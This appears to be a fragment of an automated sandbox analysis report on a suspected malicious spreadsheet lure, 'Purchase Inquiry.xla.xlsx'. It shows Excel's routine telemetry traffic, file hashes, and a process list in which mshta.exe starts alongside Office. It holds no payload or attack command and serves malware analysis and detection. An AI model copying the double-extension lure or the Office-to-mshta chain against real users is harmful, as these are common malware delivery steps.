                                                              Vary: Accept-Encoding
                                                              Cache-Control: public, max-age=604800, immutable
                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                              ETag: "0x8DC582BA41F3C62"
                                                              x-ms-request-id: 6fb1486e-801e-00a0-4fa3-912196000000
                                                              x-ms-version: 2018-03-28
                                                              x-azure-ref: 20250312T173055Z-17846f7ff6522zvlhC1BL1szx400000006e000000000t6b6
                                                              x-fd-int-roxy-purgeid: 0
                                                              X-Cache: TCP_HIT
                                                              Accept-Ranges: bytes
                                                              2025-03-12 17:30:56 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.104970713.107.246.674437116C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-12 17:30:55 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept-Encoding: gzip
                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                              Host: otelrules.svc.static.microsoft
                                                              2025-03-12 17:30:56 UTC470INHTTP/1.1 200 OK
                                                              Date: Wed, 12 Mar 2025 17:30:55 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 204
                                                              Connection: close
                                                              Cache-Control: public, max-age=604800, immutable
                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                              ETag: "0x8DC582BB6C8527A"
                                                              x-ms-request-id: 587b8034-101e-0028-765d-938f64000000
                                                              x-ms-version: 2018-03-28
                                                              x-azure-ref: 20250312T173055Z-r16856dc858jx54dhC1BL18vds000000014g000000011z3n
                                                              x-fd-int-roxy-purgeid: 0
                                                              X-Cache: TCP_HIT
                                                              Accept-Ranges: bytes
                                                              2025-03-12 17:30:56 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:13:29:30
                                                              Start date:12/03/2025
                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                              Imagebase:0x570000
                                                              File size:53'161'064 bytes
                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:12
                                                              Start time:13:30:30
                                                              Start date:12/03/2025
                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                                              Imagebase:0xa50000
                                                              File size:13'312 bytes
                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:14
                                                              Start time:13:30:33
                                                              Start date:12/03/2025
                                                              Path:C:\Windows\splwow64.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                              Imagebase:0x7ff7956f0000
                                                              File size:163'840 bytes
                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:18
                                                              Start time:13:30:50
                                                              Start date:12/03/2025
                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Purchase Inquiry.xla.xlsx"
                                                              Imagebase:0x570000
                                                              File size:53'161'064 bytes
                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              No disassembly